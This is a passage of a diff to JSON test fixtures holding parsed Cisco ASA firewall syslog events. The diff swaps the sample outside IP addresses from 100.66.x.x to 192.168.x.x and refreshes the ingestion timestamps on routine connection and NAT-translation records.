- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:34:28.099793Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721770700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:34:28.099798500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721775500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:34:28.099804100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721780900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:34:28.099832200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721786500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:34:28.099838100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721791300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:34:28.099842800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721795700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:34:28.099846500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721800200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:34:28.099851100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721804900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:34:28.099856600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721809100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:34:28.099861600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721813700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:34:28.099867600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721818500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:34:28.099872Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721822900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:34:28.099876400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721827200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:34:28.099896Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721831500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:34:28.099900700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10716,7 +10716,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11812", "source_interface": "outside", "mapped_destination_port": 1286 @@ -10738,8 +10738,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10774,7 +10774,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10785,8 +10785,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721835700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", + "ingested": "2021-12-09T13:34:28.099906400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10818,8 +10818,8 @@ }, "destination": { "port": 8291, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1287, @@ -10859,7 +10859,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10867,8 +10867,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721839900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291", + "ingested": "2021-12-09T13:34:28.099912100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10901,8 +10901,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10937,7 +10937,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10946,8 +10946,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721844200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", + "ingested": "2021-12-09T13:34:28.099939700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10963,7 +10963,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11813", "source_interface": "outside", "mapped_destination_port": 1287 @@ -10985,8 +10985,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11021,7 +11021,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11032,8 +11032,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721849200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", + "ingested": "2021-12-09T13:34:28.099945700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11070,8 +11070,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11106,7 +11106,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11117,8 +11117,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721853600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", + "ingested": "2021-12-09T13:34:28.099951700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11155,8 +11155,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11191,7 +11191,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11200,8 +11200,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721858700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099957600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11217,7 +11217,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.107", + "mapped_source_ip": "192.168.100.107", "connection_id": "11814", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11234,8 +11234,8 @@ }, "destination": { "port": 8292, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1288, @@ -11275,7 +11275,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11283,8 +11283,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721863100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292", + "ingested": "2021-12-09T13:34:28.099963500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11317,8 +11317,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11353,7 +11353,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11362,8 +11362,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721867300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", + "ingested": "2021-12-09T13:34:28.099969400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11379,7 +11379,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11815", "source_interface": "outside", "mapped_destination_port": 1288 @@ -11401,8 +11401,8 @@ }, "source": { "port": 53, - "address": "100.66.100.107", - "ip": "100.66.100.107" + "address": "192.168.100.107", + "ip": "192.168.100.107" }, "tags": [ "preserve_original_event" @@ -11437,7 +11437,7 @@ "localhost" ], "ip": [ - "100.66.100.107", + "192.168.100.107", "172.31.98.44" ] }, @@ -11447,8 +11447,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721872100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", + "ingested": "2021-12-09T13:34:28.099990900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11485,8 +11485,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11521,7 +11521,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11530,8 +11530,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721876700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099994700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -11547,7 +11547,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.104.8", + "mapped_source_ip": "192.168.104.8", "connection_id": "11816", "source_interface": "outside", "mapped_destination_port": 56132 @@ -11569,8 +11569,8 @@ }, "source": { "port": 53, - "address": "100.66.104.8", - "ip": "100.66.104.8" + "address": "192.168.104.8", + "ip": "192.168.104.8" }, "tags": [ "preserve_original_event" @@ -11605,7 +11605,7 @@ "localhost" ], "ip": [ - "100.66.104.8", + "192.168.104.8", "172.31.98.44" ] }, @@ -11615,8 +11615,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721881200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", + "ingested": "2021-12-09T13:34:28.099999200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -11648,8 +11648,8 @@ }, "destination": { "port": 8293, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1289, @@ -11689,7 +11689,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -11697,8 +11697,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721886100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293", + "ingested": "2021-12-09T13:34:28.100004200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -11731,8 +11731,8 @@ }, "source": { "port": 80, - "address": "100.66.123.191", - "ip": "100.66.123.191" + "address": "192.168.123.191", + "ip": "192.168.123.191" }, "tags": [ "preserve_original_event" @@ -11767,7 +11767,7 @@ "localhost" ], "ip": [ - "100.66.123.191", + "192.168.123.191", "172.31.98.44" ] }, @@ -11776,8 +11776,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721891700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", + "ingested": "2021-12-09T13:34:28.100009100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -11793,7 +11793,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.123.191", + "mapped_source_ip": "192.168.123.191", "connection_id": "11817", "source_interface": "outside", "mapped_destination_port": 1289 @@ -11815,8 +11815,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -11851,7 +11851,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -11862,8 +11862,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721896700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 